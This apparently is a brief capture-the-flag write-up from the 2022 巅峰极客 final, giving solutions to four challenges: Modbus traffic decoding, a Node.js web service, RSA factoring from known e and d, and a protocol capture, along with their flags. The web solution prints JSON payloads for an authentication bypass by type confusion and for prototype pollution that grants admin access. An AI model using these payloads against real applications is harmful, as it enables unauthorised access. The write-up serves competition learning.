2022 巅峰极客决赛
Rank: 10
StrangeTemporature
Extract nth base64 bytes from modbus/tcp protocl.
1 | ZmxhZ3s5N2JmZWIwMy1mYTVjLWFhNmYtYWQxZS05YzVkMzhjNzQ0OWV9 |
From Base64:
1 | flag{97bfeb03-fa5c-aa6f-ad1e-9c5d38c7449e} |
Nodesystem
In the POST /api we can use an arbitrary filename, find the directory:
1 | {"auth": {"name[]":"admin", "password[]":true}, "filename" : "test"} |
Use the index.js
we can find the source code.
1 | const express = require('express'); |
In the message function, we can put a prototype pollution.
1 | {"auth": {"name":"test", "password":"test"},"message":{"admin":true},"message":{"__proto__":{"admin":true}}} |
Then request POST /debug:
1 | {"auth": {"name":"test", "password":"test"}, "filename":"index.js"} |
1 | flag{bb5c92fd-e976-482d-bd8d-fe75c7709473} |
gcd
Find this article: https://math.stackexchange.com/questions/985085/attack-on-rsa-factoring-when-knowing-e-and-d
Then use the method from this pptx: https://web.archive.org/web/20081122133715/https://www.cs.purdue.edu/homes/ninghui/courses/Fall04/lectures/lect14-c.pdf
1 | from math import gcd |
1 | flag{bs903sk_fbnw34f8_cwn3efh} |
babyProtocol
Use IOA concat flag:
1 | flag{68b34d92d8a8445039dce-d6819d2362d5} |
1 | import json |
Remove all frames that IV=1
1 | flag{68b34d92d88445039dced6819d2362d5} |
2022 巅峰极客决赛